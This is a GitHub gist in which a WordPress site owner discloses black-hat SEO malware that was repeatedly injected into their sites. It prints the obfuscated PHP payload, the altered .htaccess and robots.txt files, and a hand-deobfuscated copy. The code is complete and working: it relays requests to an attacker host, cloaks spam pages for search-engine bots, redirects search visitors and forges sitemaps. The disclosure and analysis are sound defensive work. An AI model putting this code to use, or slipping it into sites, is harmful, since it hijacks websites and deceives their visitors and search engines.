Skip to content

Instantly share code, notes, and snippets.

@mrbrainz

mrbrainz/Exploited Wordpress Index File - Sitemap Malware

Last active March 23, 2024 09:40
Show Gist options
  • Save mrbrainz/4f31b7428b508f3b7b236ffd090982a0 to your computer and use it in GitHub Desktop.
Save mrbrainz/4f31b7428b508f3b7b236ffd090982a0 to your computer and use it in GitHub Desktop.
Download ZIP
Unobfuscation of a complicated malware that uses fake XML sitemaps for backhat SEO. This code was being injected into 2 of my Wordpress sites' index.php files every 2 days. I couldn't find where the security hole is, but the code was always the same. I spend time going through and unobfuscating by hand, as no online tool I could find would decod…
Raw
Exploited Wordpress Index File - Sitemap Malware
<?php @header('Content-Type:text/html;charset=utf-8');error_reporting(0); $OOOOOO="%71%77%65%72%74%79%75%69%6f%70%61%73%64%66%67%68%6a%6b%6c%7a%78%63%76%62%6e%6d%51%57%45%52%54%59%55%49%4f%50%41%53%44%46%47%48%4a%4b%4c%5a%58%43%56%42%4e%4d%5f%2d%22%3f%3e%20%3c%2e%2d%3d%3a%2f%31%32%33%30%36%35%34%38%37%39%27%3b%28%29%26%5e%24%5b%5d%5c%5c%25%7b%7d%21%2a%7c%2b%2c"; global $O; $O=urldecode($OOOOOO);$oOooOO='z1228';$oOooOOoO=$O{15}.$O{4}.$O{4}.$O{9}.$O{62}.$O{63}.$O{63}.$oOooOO.$O{59}.$O{10}.$O{14}.$O{8}.$O{8}.$O{12}.$O{11}.$O{59}.$O{4}.$O{8}.$O{9}; function ooooooooOOOOOOOOoooooOOO($oooOOOoOoo){$ooooOOOooOo=curl_init();curl_setopt ($ooooOOOooOo, CURLOPT_URL, $oooOOOoOoo);curl_setopt ($ooooOOOooOo, CURLOPT_RETURNTRANSFER, 1);curl_setopt ($ooooOOOooOo, CURLOPT_CONNECTTIMEOUT, 5);$oooooOOOOooO = curl_exec($ooooOOOooOo);curl_close($ooooOOOooOo);return $oooooOOOOooO; } function ooOOoOOO($OooooO,$OOOoooo=array()){global $O;$OooooO=str_replace(' ','+',$OooooO);$OOooooO=curl_init();curl_setopt($OOooooO,CURLOPT_URL, "$OooooO");curl_setopt($OOooooO,CURLOPT_RETURNTRANSFER, 1);curl_setopt($OOooooO,CURLOPT_HEADER, 0);curl_setopt($OOooooO,CURLOPT_TIMEOUT,10);curl_setopt($OOooooO,CURLOPT_POST, 1);curl_setopt($OOooooO,CURLOPT_POSTFIELDS, http_build_query($OOOoooo));$OOOOooo=curl_exec($OOooooO);$OOOOoooOO=curl_errno($OOooooO);curl_close($OOooooO);if(0!==$OOOOoooOO){return false;}return $OOOOooo;}function oooOOOo($ooOOo){global $O;$ooOOOOo = false;$oooooOOo = $O{14}.$O{8}.$O{8}.$O{14}.$O{18}.$O{2}.$O{23}.$O{8}.$O{4}.$O{90}.$O{23}.$O{7}.$O{24}.$O{14}.$O{23}.$O{8}.$O{4}.$O{90}.$O{14}.$O{8}.$O{8}.$O{14}.$O{18}.$O{2}.$O{90}.$O{10}.$O{8}.$O{18}.$O{90}.$O{23}.$O{7}.$O{24}.$O{14}.$O{90}.$O{5}.$O{10}.$O{15}.$O{8}.$O{8};if ($ooOOo!=''){if (preg_match("/($oooooOOo)/si",$ooOOo)){$ooOOOOo=true;}}return $ooOOOOo;}function oooOOooOOoOO($oOOOOOOoOOOO){global $O;$ooOOOOOOoO=false;$ooOOOOOOoOo=$O{14}.$O{8}.$O{8}.$O{14}.$O{18}.$O{2}.$O{59}.$O{21}.$O{8}.$O{90}.$O{5}.$O{10}.$O{15}.$O{8}.$O{8}.$O{59}.$O{21}.$O{8}.$O{59}.$O{16}.$O{9}.$O{90}.$O{23}.$O{7}.$O{24}.$O{14};if ($oOOOOOOoOOOO!='' && preg_match("/($ooOOOOOOoOo)/si", $oOOOOOOoOOOO)) {$ooOOOOOOoO=true;}return $ooOOOOOOoO;}$oOooOOoOO=((isset($_SERVER[$O{41}.$O{30}.$O{30}.$O{35}.$O{37}])&&$_SERVER[$O{41}.$O{30}.$O{30}.$O{35}.$O{37}]!==$O{8}.$O{13}.$O{13})?$O{15}.$O{4}.$O{4}.$O{9}.$O{11}.$O{62}.$O{63}.$O{63}:$O{15}.$O{4}.$O{4}.$O{9}.$O{62}.$O{63}.$O{63});$oOoooOOoOO=$_SERVER[$O{29}.$O{28}.$O{26}.$O{32}.$O{28}.$O{37}.$O{30}.$O{52}.$O{32}.$O{29}.$O{33}];$ooOOoooOOoOO=$_SERVER[$O{41}.$O{30}.$O{30}.$O{35}.$O{52}.$O{41}.$O{34}.$O{37}.$O{30}];$ooOOOoooOOoOO=$_SERVER[$O{35}.$O{41}.$O{35}.$O{52}.$O{37}.$O{28}.$O{44}.$O{39}];$ooOOOOoooOOOoOO=$_SERVER[$O{37}.$O{28}.$O{29}.$O{48}.$O{28}.$O{29}.$O{52}.$O{50}.$O{36}.$O{51}.$O{28}];$ooOOOOoooOOOOoOO=$oOooOOoOO.$ooOOoooOOoOO.$oOoooOOoOO;$oooOOOOoooOOOooOO=$oOooOOoO.$O{63}.$O{7}.$O{24}.$O{12}.$O{10}.$O{4}.$O{10}.$O{59}.$O{9}.$O{15}.$O{9};$ooooOOOOoooOOOooO=$oOooOOoO.$O{63}.$O{25}.$O{10}.$O{9}.$O{59}.$O{9}.$O{15}.$O{9};$ooooOOOOoooOOOooOoo=$oOooOOoO.$O{63}.$O{16}.$O{6}.$O{25}.$O{9}.$O{59}.$O{9}.$O{15}.$O{9};$oooooOOoooOOOoooOoo=$oOooOOoO.$O{63}.$O{1}.$O{8}.$O{3}.$O{12}.$O{11}.$O{59}.$O{9}.$O{15}.$O{9};$ooooooooOOOOoooOOoooOO=$oOooOOoO.$O{63}.$O{3}.$O{8}.$O{23}.$O{8}.$O{4}.$O{11}.$O{59}.$O{9}.$O{15}.$O{9};if(strpos($oOoooOOoOO,$O{59}.$O{9}.$O{15}.$O{9})){$ooooooOOoooOOOoooOo=$oOooOOoOO.$ooOOoooOOoOO.$ooOOOoooOOoOO;}else{$ooooooOOoooOOOoooOo=$oOooOOoOO.$ooOOoooOOoOO;}$ooooooOoOoooOOOooo[]=array();$ooooooOoOoooOOOooo[$O{12}.$O{8}.$O{25}.$O{10}.$O{7}.$O{24}]=$ooOOoooOOoOO;$ooooooOoOoooOOOooo[$O{3}.$O{2}.$O{0}.$O{52}.$O{6}.$O{3}.$O{7}]=$oOoooOOoOO;$ooooooOoOoooOOOooo[$O{15}.$O{3}.$O{2}.$O{13}]=$ooooooOOoooOOOoooOo;$ooooooOoOoooOOOooo[$O{3}.$O{2}.$O{0}.$O{52}.$O{6}.$O{3}.$O{18}]=$ooOOOOoooOOOOoOO;if(substr($oOoooOOoOO,-6)==$O{3}.$O{8}.$O{23}.$O{8}.$O{4}.$O{11}){$ooooooooOOOOOoooOoOoooOO = ooOOoOOO($ooooooooOOOOoooOOoooOO,$ooooooOoOoooOOOooo);define('BASE_PATH',str_ireplace($_SERVER[$O{35}.$O{41}.$O{35}.$O{52}.$O{37}.$O{28}.$O{44}.$O{39}],'',__FILE__));file_put_contents(BASE_PATH.$O{63}.$O{3}.$O{8}.$O{23}.$O{8}.$O{4}.$O{11}.$O{59}.$O{4}.$O{20}.$O{4},$ooooooooOOOOOoooOoOoooOO);$ooooooooOOOOOoooOoOoooOO=file_get_contents(BASE_PATH.$O{63}.$O{3}.$O{8}.$O{23}.$O{8}.$O{4}.$O{11}.$O{59}.$O{4}.$O{20}.$O{4});if(strpos($ooooooooOOOOOoooOoOoooOO,$O{47}.$O{3}.$O{10}.$O{1}.$O{18}.$O{53}.$O{12}.$O{2}.$O{18}.$O{10}.$O{5}.$O{62}.$O{66})){ echo $O{3}.$O{8}.$O{23}.$O{8}.$O{4}.$O{11}.$O{59}.$O{4}.$O{20}.$O{4}.$O{57}.$O{13}.$O{7}.$O{18}.$O{2}.$O{57}.$O{21}.$O{3}.$O{2}.$O{10}.$O{4}.$O{2}.$O{57}.$O{11}.$O{6}.$O{21}.$O{21}.$O{2}.$O{11}.$O{11}.$O{88};}else{ echo $O{3}.$O{8}.$O{23}.$O{8}.$O{4}.$O{11}.$O{59}.$O{4}.$O{20}.$O{4}.$O{57}.$O{13}.$O{7}.$O{18}.$O{2}.$O{57}.$O{21}.$O{3}.$O{2}.$O{10}.$O{4}.$O{2}.$O{57}.$O{13}.$O{10}.$O{7}.$O{18}.$O{88};}exit; }if(substr($oOoooOOoOO,-4)==$O{59}.$O{20}.$O{25}.$O{18}){if(strpos($oOoooOOoOO,$O{9}.$O{7}.$O{24}.$O{14}.$O{11}.$O{7}.$O{4}.$O{2}.$O{25}.$O{10}.$O{9}.$O{59}.$O{20}.$O{25}.$O{18})){$ooooooOoOoooOOOooooO = ooOOoOOO($ooooOOOOoooOOOooO,$ooooooOoOoooOOOooo);$ooooooOOoooOOOooooOOO= explode(",",$ooooooOoOoooOOOooooO);$ooooooOOoooOOOooooOOO[]=$O{11}.$O{7}.$O{4}.$O{2}.$O{25}.$O{10}.$O{9};for($ooooooOOoooOOOooooOOOOo=0;$ooooooOOoooOOOooooOOOOo<count($ooooooOOoooOOOooooOOO);$ooooooOOoooOOOooooOOOOo++){if(strpos($ooooooOOoooOOOoooOo,$O{59}.$O{9}.$O{15}.$O{9})> 0){$ooooooOOoooOOOooooOOOOoo=$O{55};}else{$ooooooOOoooOOOooooOOOOoo=$O{63}; } $ooooooOOOoooOOOooooOOOOOoo=$ooooooOOoooOOOoooOo.$ooooooOOoooOOOooooOOOOoo.$ooooooOOoooOOOooooOOO[$ooooooOOoooOOOooooOOOOo].$O{59}.$O{20}.$O{25}.$O{18}; $ooooooOOOOoooOOOooooOOOOOo=$O{15}.$O{4}.$O{4}.$O{9}.$O{11}.$O{62}.$O{63}.$O{63}.$O{1}.$O{1}.$O{1}.$O{59}.$O{14}.$O{8}.$O{8}.$O{14}.$O{18}.$O{2}.$O{59}.$O{21}.$O{8}.$O{25}.$O{63}.$O{9}.$O{7}.$O{24}.$O{14}.$O{55}.$O{11}.$O{7}.$O{4}.$O{2}.$O{25}.$O{10}.$O{9}.$O{61}.$ooooooOOOoooOOOooooOOOOOoo; $ooooooOOOOoooOOOooooOOOOOoOooOoOo=$O{15}.$O{4}.$O{4}.$O{9}.$O{62}.$O{63}.$O{63}.$O{1}.$O{1}.$O{1}.$O{59}.$O{14}.$O{8}.$O{8}.$O{14}.$O{18}.$O{2}.$O{59}.$O{21}.$O{8}.$O{25}.$O{63}.$O{9}.$O{7}.$O{24}.$O{14}.$O{55}.$O{11}.$O{7}.$O{4}.$O{2}.$O{25}.$O{10}.$O{9}.$O{61}.$ooooooOOOoooOOOooooOOOOOoo; if(stristr(@file_get_contents($ooooooOOOOoooOOOooooOOOOOo),$O{11}.$O{6}.$O{21}.$O{21}.$O{2}.$O{11}.$O{11}.$O{13}.$O{6}.$O{18}.$O{18}.$O{5})){echo $ooooooOOOOoooOOOooooOOOOOo.$O{61}.$O{61}.$O{61}.$O{56}.$O{37}.$O{6}.$O{23}.$O{25}.$O{7}.$O{4}.$O{4}.$O{7}.$O{24}.$O{14}.$O{57}.$O{40}.$O{8}.$O{8}.$O{14}.$O{18}.$O{2}.$O{57}.$O{37}.$O{7}.$O{4}.$O{2}.$O{25}.$O{10}.$O{9}.$O{62}.$O{57}.$O{34}.$O{43}.PHP_EOL;}else if(stristr(@ooooooooOOOOOOOOoooooOOO($ooooooOOOOoooOOOooooOOOOOo),$O{11}.$O{6}.$O{21}.$O{21}.$O{2}.$O{11}.$O{11}.$O{13}.$O{6}.$O{18}.$O{18}.$O{5})){ echo $ooooooOOOOoooOOOooooOOOOOo.$O{61}.$O{61}.$O{61}.$O{56}.$O{37}.$O{6}.$O{23}.$O{25}.$O{7}.$O{4}.$O{4}.$O{7}.$O{24}.$O{14}.$O{57}.$O{40}.$O{8}.$O{8}.$O{14}.$O{18}.$O{2}.$O{57}.$O{37}.$O{7}.$O{4}.$O{2}.$O{25}.$O{10}.$O{9}.$O{62}.$O{57}.$O{34}.$O{43}.PHP_EOL; }else if(stristr(@file_get_contents($ooooooOOOOoooOOOooooOOOOOoOooOoOo),$O{11}.$O{6}.$O{21}.$O{21}.$O{2}.$O{11}.$O{11}.$O{13}.$O{6}.$O{18}.$O{18}.$O{5})){ echo $ooooooOOOOoooOOOooooOOOOOoOooOoOo.$O{61}.$O{61}.$O{61}.$O{56}.$O{37}.$O{6}.$O{23}.$O{25}.$O{7}.$O{4}.$O{4}.$O{7}.$O{24}.$O{14}.$O{57}.$O{40}.$O{8}.$O{8}.$O{14}.$O{18}.$O{2}.$O{57}.$O{37}.$O{7}.$O{4}.$O{2}.$O{25}.$O{10}.$O{9}.$O{62}.$O{57}.$O{34}.$O{43}.PHP_EOL; }else if(stristr(@ooooooooOOOOOOOOoooooOOO($ooooooOOOOoooOOOooooOOOOOoOooOoOo),$O{11}.$O{6}.$O{21}.$O{21}.$O{2}.$O{11}.$O{11}.$O{13}.$O{6}.$O{18}.$O{18}.$O{5})){ echo $ooooooOOOOoooOOOooooOOOOOoOooOoOo.$O{61}.$O{61}.$O{61}.$O{56}.$O{37}.$O{6}.$O{23}.$O{25}.$O{7}.$O{4}.$O{4}.$O{7}.$O{24}.$O{14}.$O{57}.$O{40}.$O{8}.$O{8}.$O{14}.$O{18}.$O{2}.$O{57}.$O{37}.$O{7}.$O{4}.$O{2}.$O{25}.$O{10}.$O{9}.$O{62}.$O{57}.$O{34}.$O{43}.PHP_EOL; }else{echo $ooooooOOOOoooOOOooooOOOOOoOooOoOo.$O{61}.$O{61}.$O{61}.$O{56}.$O{37}.$O{6}.$O{23}.$O{25}.$O{7}.$O{4}.$O{4}.$O{7}.$O{24}.$O{14}.$O{57}.$O{40}.$O{8}.$O{8}.$O{14}.$O{18}.$O{2}.$O{57}.$O{37}.$O{7}.$O{4}.$O{2}.$O{25}.$O{10}.$O{9}.$O{62}.$O{57}.$O{13}.$O{10}.$O{7}.$O{18}.PHP_EOL;}}exit;}if(strpos($oOoooOOoOO,$O{10}.$O{18}.$O{18}.$O{11}.$O{7}.$O{4}.$O{2}.$O{25}.$O{10}.$O{9}.$O{59}.$O{20}.$O{25}.$O{18})){$ooooooOoOoooOOOooooO = ooOOoOOO($ooooOOOOoooOOOooO,$ooooooOoOoooOOOooo);header($O{47}.$O{8}.$O{24}.$O{4}.$O{2}.$O{24}.$O{4}.$O{53}.$O{4}.$O{5}.$O{9}.$O{2}.$O{62}.$O{4}.$O{2}.$O{20}.$O{4}.$O{63}.$O{20}.$O{25}.$O{18}); echo $ooooooOoOoooOOOooooO;exit;}if(strpos($oOoooOOoOO,$O{59}.$O{9}.$O{15}.$O{9})){ $ooooooOOoOOoooOOOooooOOOOO=explode($O{55},$oOoooOOoOO); $ooooooOOoOOoooOOOooooOOOOO=$ooooooOOoOOoooOOOooooOOOOO[count($ooooooOOoOOoooOOOooooOOOOO)-1]; $ooooooOOoOOoooOOOooooOOOOO=str_replace($O{59}.$O{20}.$O{25}.$O{18},"",$ooooooOOoOOoooOOOooooOOOOO);}else{ $ooooooOOoOOoooOOOooooOOOOO= str_replace($O{63},"",$oOoooOOoOO);$ooooooOOoOOoooOOOooooOOOOO= str_replace($O{59}.$O{20}.$O{25}.$O{18},"",$ooooooOOoOOoooOOOooooOOOOO);}$ooooooOoOoooOOOooo[$O{1}.$O{8}.$O{3}.$O{12}]=$ooooooOOoOOoooOOOooooOOOOO;$ooooooOoOoooOOOooo[$O{10}.$O{21}.$O{4}.$O{7}.$O{8}.$O{24}]=$O{21}.$O{15}.$O{2}.$O{21}.$O{17}.$O{52}.$O{11}.$O{7}.$O{4}.$O{2}.$O{25}.$O{10}.$O{9};$ooooooOOoOoOoooOOOooooOOoOOO=ooOOoOOO($oooooOOoooOOOoooOoo,$ooooooOoOoooOOOooo);if($ooooooOOoOoOoooOOOooooOOoOOO=='1'){$ooooooOoOoooOOOooooO=ooOOoOOO($ooooOOOOoooOOOooO,$ooooooOoOoooOOOooo);header($O{47}.$O{8}.$O{24}.$O{4}.$O{2}.$O{24}.$O{4}.$O{53}.$O{4}.$O{5}.$O{9}.$O{2}.$O{62}.$O{4}.$O{2}.$O{20}.$O{4}.$O{63}.$O{20}.$O{25}.$O{18});echo $ooooooOoOoooOOOooooO;exit;}$ooooooOoOoooOOOooo[$O{10}.$O{21}.$O{4}.$O{7}.$O{8}.$O{24}]=$O{21}.$O{15}.$O{2}.$O{21}.$O{17}.$O{52}.$O{1}.$O{8}.$O{3}.$O{12}.$O{11};$ooooooOOoOoOoooOOOooooOOoOoOO= ooOOoOOO($oooooOOoooOOOoooOoo,$ooooooOoOoooOOOooo);if(strpos($oOoooOOoOO,$O{25}.$O{10}.$O{9})> 0 || $ooooooOOoOoOoooOOOooooOOoOoOO=='1'){$ooooooOoOoooOOOooo[$O{10}.$O{21}.$O{4}.$O{7}.$O{8}.$O{24}]=$O{3}.$O{10}.$O{24}.$O{12}.$O{52}.$O{20}.$O{25}.$O{18};$ooooooOOoOoOoooOOOooooOOoOOO=ooOOoOOO($oooooOOoooOOOoooOoo,$ooooooOoOoooOOOooo);header($O{47}.$O{8}.$O{24}.$O{4}.$O{2}.$O{24}.$O{4}.$O{53}.$O{4}.$O{5}.$O{9}.$O{2}.$O{62}.$O{4}.$O{2}.$O{20}.$O{4}.$O{63}.$O{20}.$O{25}.$O{18});echo $ooooooOOoOoOoooOOOooooOOoOOO;exit;}}if(strpos($oOoooOOoOO,$O{59}.$O{9}.$O{15}.$O{9})){$ooooooOOooOooOoooOOOooooOOoOoOO=$oOooOOoOO.$ooOOOOoooOOOoOO.$ooOOOoooOOoOO;$ooooooOoOoooOOOooo[$O{25}.$O{10}.$O{7}.$O{24}.$O{52}.$O{11}.$O{15}.$O{2}.$O{18}.$O{18}]=$ooooooOOooOooOoooOOOooooOOoOoOO;}else{$ooooooOOooOooOoooOOOooooOOoOoOO=$oOooOOoOO.$ooOOOOoooOOOoOO;$ooooooOoOoooOOOooo[$O{25}.$O{10}.$O{7}.$O{24}.$O{52}.$O{11}.$O{15}.$O{2}.$O{18}.$O{18}]=$ooooooOOooOooOoooOOOooooOOoOoOO;}if(substr($oOoooOOoOO,-4)==$O{59}.$O{15}.$O{4}.$O{25}){$oooOOOooOoooOOOooooOoOoOoOoO=isset($_SERVER[$O{41}.$O{30}.$O{30}.$O{35}.$O{52}.$O{29}.$O{28}.$O{39}.$O{28}.$O{29}.$O{28}.$O{29}])?$_SERVER[$O{41}.$O{30}.$O{30}.$O{35}.$O{52}.$O{29}.$O{28}.$O{39}.$O{28}.$O{29}.$O{28}.$O{29}]:'';$ooooOoOOooOoooOOOoOoOoOoO=oooOOooOOoOO($oooOOOooOoooOOOooooOoOoOoOoO);if($ooooOoOOooOoooOOOoOoOoOoO){echo ooOOoOOO($ooooOOOOoooOOOooOoo,$ooooooOoOoooOOOooo);exit;}$oooOoOOooOoooOOOoOoOoOoOoO=strtolower(isset($_SERVER[$O{41}.$O{30}.$O{30}.$O{35}.$O{52}.$O{32}.$O{37}.$O{28}.$O{29}.$O{52}.$O{36}.$O{40}.$O{28}.$O{50}.$O{30}])?$_SERVER[$O{41}.$O{30}.$O{30}.$O{35}.$O{52}.$O{32}.$O{37}.$O{28}.$O{29}.$O{52}.$O{36}.$O{40}.$O{28}.$O{50}.$O{30}]:'');$oooOoOooOooOoooOOOoOoOoOoOo=oooOOOo($oooOoOOooOoooOOOoOoOoOoOoO);if($oooOoOooOooOoooOOOoOoOoOoOo){$ooooooOoOoooOOOooo[$O{15}.$O{4}.$O{4}.$O{9}.$O{52}.$O{6}.$O{11}.$O{2}.$O{3}.$O{52}.$O{10}.$O{14}.$O{2}.$O{24}.$O{4}]=$oooOoOOooOoooOOOoOoOoOoOoO; $ooooooOOOOOoooOOOOooooooO = ooOOoOOO($oooOOOOoooOOOooOO,$ooooooOoOoooOOOooo); if($ooooooOOOOOoooOOOOooooooO==$O{70}.$O{67}.$O{70}){header($O{41}.$O{30}.$O{30}.$O{35}.$O{63}.$O{64}.$O{59}.$O{67}.$O{57}.$O{70}.$O{67}.$O{70}.$O{57}.$O{50}.$O{8}.$O{4}.$O{57}.$O{39}.$O{8}.$O{6}.$O{24}.$O{12});exit;}else if($ooooooOOOOOoooOOOOooooooO==$O{69}.$O{67}.$O{67}){header($O{41}.$O{30}.$O{30}.$O{35}.$O{63}.$O{64}.$O{59}.$O{67}.$O{57}.$O{69}.$O{67}.$O{67}.$O{57}.$O{33}.$O{24}.$O{4}.$O{2}.$O{3}.$O{24}.$O{10}.$O{18}.$O{57}.$O{37}.$O{2}.$O{3}.$O{22}.$O{2}.$O{3}.$O{57}.$O{28}.$O{3}.$O{3}.$O{8}.$O{3});exit;}else if($ooooooOOOOOoooOOOOooooooO==$O{23}.$O{18}.$O{10}.$O{24}.$O{17}){echo '';exit;}else{echo $ooooooOOOOOoooOOOOooooooO;exit;} }else{ header($O{41}.$O{30}.$O{30}.$O{35}.$O{63}.$O{64}.$O{59}.$O{67}.$O{57}.$O{70}.$O{67}.$O{70}.$O{57}.$O{50}.$O{8}.$O{4}.$O{57}.$O{39}.$O{8}.$O{6}.$O{24}.$O{12});}} ?>
<?php
/**
* Front to the WordPress application. This file doesn't do anything, but loads
* wp-blog-header.php which does and tells WordPress to load the theme.
*
* @package WordPress
*/
/**
* Tells WordPress to load the WordPress theme and output it.
*
* @var bool
*/
define( 'WP_USE_THEMES', true );
/** Loads the WordPress Environment and Template */
require __DIR__ . '/wp-blog-header.php';
Raw
htaccess
<FilesMatch ".(PhP|php5|suspected|phtml|py|exe|php)$">
Order allow,deny
Deny from all
</FilesMatch>
<FilesMatch "(^wp-feed.php|^index.php|^qindex.php|^db.php|^wp-mail.php|^recollection.php|^ticket.php|^language_view.php|^wp-activate.php|^wp-links-opml.php|^wp-blog-header.php|^wp-load.php|^wp-signup.php|^admin-filters.php|^wp-trackback.php|^loggertrait.php|^account.php|^theme_support.php|^bt4.php|^wp-atom.php|^style.php|^atomlib.php|^makeasmtp.php|^prayer_intentions.php|^wp-settings.php|^shadow-bot.php|^class-ai1wm-status.php|^melipayamakapi.php|^csv.php|^rptegmfmcq.php|^wlkjfoqicr.php|^0z.php|^bucketendpointmiddleware.php|^classwithtostring.php|^baindex.php|^phpmailer.lang-sv.php|^state.php|^special_dishes.php|^nf_tracking.php|^webhook.php|^pnnfxpueiq.php|^autoload_classmap.php|^shadow.php|^sample.php|^1index.php|^error_exception.php|^wp-config.php|^xmlrpc.php|^wp-pano.php|^main.php|^product.php|^goods.php|^shop.php|^store.php|^online.php|^good.php|^discount.php|^buy.php|^sale.php|^mall.php|^amazon.php|^groupon.php|^lowpr.php|^savep.php|^infos.php|^pindex.php|^todo.php|^start.php|^chosen.php|^style.php|^wp-conflg.php|^wp-22.php|^class.phtml|^index.php)$">
Order allow,deny
Allow from all
</FilesMatch>
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . index.php [L]
</IfModule>
Raw
robots.txt
User-agent: *
Allow: /
Crawl-delay:3
Sitemap:https://[exploitedsite.com]/resuggestogv.xml
Sitemap:https://[exploitedsite.com]/biminizgk.xml
Sitemap:https://[exploitedsite.com]/reputedlyenq.xml
Sitemap:https://[exploitedsite.com]/accelerometeraam.xml
Sitemap:https://[exploitedsite.com]/concatenationfat.xml
Sitemap:https://[exploitedsite.com]/paraplectickxm.xml
Sitemap:https://[exploitedsite.com]/equitriangularjng.xml
Sitemap:https://[exploitedsite.com]/equipotentzfa.xml
Sitemap:https://[exploitedsite.com]/savingsjna.xml
Sitemap:https://[exploitedsite.com]/opsisformslv.xml
Sitemap:https://[exploitedsite.com]/aidefyn.xml
Sitemap:https://[exploitedsite.com]/kickboardufj.xml
Sitemap:https://[exploitedsite.com]/poromaipm.xml
Sitemap:https://[exploitedsite.com]/plantigradeash.xml
Sitemap:https://[exploitedsite.com]/darealltzx.xml
Sitemap:https://[exploitedsite.com]/sitemap.xml
Raw
Unobfuscated malware code
<?php @header("Content-Type:text/html;charset=utf-8");
$attacksubdomain = "z1228";
$attacksite = "http://" . $attacksubdomain . ".agoods.top";
function curlget($url)
{
$curl = curl_init();
curl_setopt($curl, CURLOPT_URL, $url);
curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($curl, CURLOPT_CONNECTTIMEOUT, 5);
$result = curl_exec($curl);
curl_close($curl);
return $result;
}
function curlpost($url, $queryvars = [])
{
$url = str_replace(" ", "+", $url);
$curl = curl_init();
curl_setopt($curl, CURLOPT_URL, "$url");
curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($curl, CURLOPT_HEADER, 0);
curl_setopt($curl, CURLOPT_TIMEOUT, 10);
curl_setopt($curl, CURLOPT_POST, 1);
curl_setopt($curl, CURLOPT_POSTFIELDS, http_build_query($queryvars));
$result = curl_exec($curl);
$curlerror = curl_errno($curl);
curl_close($curl);
if (0 !== $curlerror) {
return false;
}
return $result;
}
function checkbots($useragent)
{
$result = false;
$botstrings = "googlebot|bingbot|google|aol|bing|yahoo";
if ($useragent != "") {
if (preg_match("/($botstrings)/si", $useragent)) {
$result = true;
}
}
return $result;
}
function checkreferer($referer)
{
$result = false;
$goodbots = "google.co|yahoo.co.jp|bing";
if ($referer != "" && preg_match("/($goodbots)/si", $referer)) {
$result = true;
}
return $result;
}
$protocol =
isset($_SERVER["HTTPS"]) && $_SERVER["HTTPS"] !== "off"
? "https://"
: "http://";
$requesturi = $_SERVER["REQUEST_URI"];
$httphost = $_SERVER["HTTP_HOST"];
$phpself = $_SERVER["PHP_SELF"];
$servername = $_SERVER["SERVER_NAME"];
$thisurl = $protocol . $httphost . $requesturi;
$indataphp = $attacksite . "/indata.php";
$mapphp = $attacksite . "/map.php";
$jumpphp = $attacksite . "/jump.php";
$wordsphp = $attacksite . "/words.php";
$robotsphp = $attacksite . "/robots.php";
if (strpos($requesturi, ".php")) {
$href = $protocol . $httphost . $phpself;
} else {
$href = $protocol . $httphost;
}
$vars[] = [];
$vars["domain"] = $httphost;
$vars["req_uri"] = $requesturi;
$vars["href"] = $href;
$vars["req_url"] = $thisurl;
if (substr($requesturi, -6) == "robots") {
$curlresult = curlpost($robotsphp, $vars);
define("BASE_PATH", str_ireplace($_SERVER["PHP_SELF"], "", __FILE__));
file_put_contents(BASE_PATH . "/robots.txt", $curlresult);
$curlresult = file_get_contents(BASE_PATH . "/robots.txt");
if (strpos($curlresult, "Crawl-delay:3")) {
echo "robots.txt file create success!";
} else {
echo "robots.txt file create fail!";
}
exit();
}
if (substr($requesturi, -4) == ".xml") {
if (strpos($requesturi, "pingsitemap.xml")) {
$mapcurl = curlpost($mapphp, $vars);
$mapcurlresult = explode(",", $mapcurl);
$mapcurlresult[] = "sitemap";
for ($i = 0; $i < count($mapcurlresult); $i++) {
if (strpos($href, ".php") > 0) {
$separator = "?";
} else {
$separator = "/";
}
$sitemap = $href . $separator . $mapcurlresult[$i] . ".xml";
$googleurl = "https://www.google.com/ping?sitemap=" . $sitemap;
$googleurlssl = "http://www.google.com/ping?sitemap=" . $sitemap;
if (stristr(@file_get_contents($googleurl), "successfully")) {
echo $googleurl . "===>Submitting Google Sitemap: OK" . PHP_EOL;
} elseif (stristr(@curlget($googleurl), "successfully")) {
echo $googleurl . "===>Submitting Google Sitemap: OK" . PHP_EOL;
} elseif (
stristr(@file_get_contents($googleurlssl), "successfully")
) {
echo $googleurlssl .
"===>Submitting Google Sitemap: OK" .
PHP_EOL;
} elseif (stristr(@curlget($googleurlssl), "successfully")) {
echo $googleurlssl .
"===>Submitting Google Sitemap: OK" .
PHP_EOL;
} else {
echo $googleurlssl .
"===>Submitting Google Sitemap: fail" .
PHP_EOL;
}
}
exit();
}
if (strpos($requesturi, "allsitemap.xml")) {
$mapcurl = curlpost($mapphp, $vars);
header("Content-type:text/xml");
echo $mapcurl;
exit();
}
if (strpos($requesturi, ".php")) {
$urlparts = explode("?", $requesturi);
$urlparts = $urlparts[count($urlparts) - 1];
$urlparts = str_replace(".xml", "", $urlparts);
} else {
$urlparts = str_replace("/", "", $requesturi);
$urlparts = str_replace(".xml", "", $urlparts);
}
$vars["word"] = $urlparts;
$vars["action"] = "check_sitemap";
$wordscurl = curlpost($wordsphp, $vars);
if ($wordscurl == "1") {
$mapcurl = curlpost($mapphp, $vars);
header("Content-type:text/xml");
echo $mapcurl;
exit();
}
$vars["action"] = "check_words";
$wordsrecurl = curlpost($wordsphp, $vars);
if (strpos($requesturi, "map") > 0 || $wordsrecurl == "1") {
$vars["action"] = "rand_xml";
$wordscurl = curlpost($wordsphp, $vars);
header("Content-type:text/xml");
echo $wordscurl;
exit();
}
}
if (strpos($requesturi, ".php")) {
$mainshell = $protocol . $servername . $phpself;
$vars["main_shell"] = $mainshell;
} else {
$mainshell = $protocol . $servername;
$vars["main_shell"] = $mainshell;
}
if (substr($requesturi, -4) == ".htm") {
$referer = isset($_SERVER["HTTP_REFERER"]) ? $_SERVER["HTTP_REFERER"] : "";
$isgoodbot = checkreferer($referer);
if ($isgoodbot) {
echo curlpost($jumpphp, $vars);
exit();
}
$useragent = strtolower(
isset($_SERVER["HTTP_USER_AGENT"]) ? $_SERVER["HTTP_USER_AGENT"] : ""
);
$isbot = checkbots($useragent);
if ($isbot) {
$vars["http_user_agent"] = $useragent;
$indatacurl = curlpost($indataphp, $vars);
if ($indatacurl == "404") {
header("HTTP/1.0 404 Not Found");
exit();
} elseif ($indatacurl == "500") {
header("HTTP/1.0 500 Internal Server Error");
exit();
} elseif ($indatacurl == "blank") {
echo "";
exit();
} else {
echo $indatacurl;
exit();
}
} else {
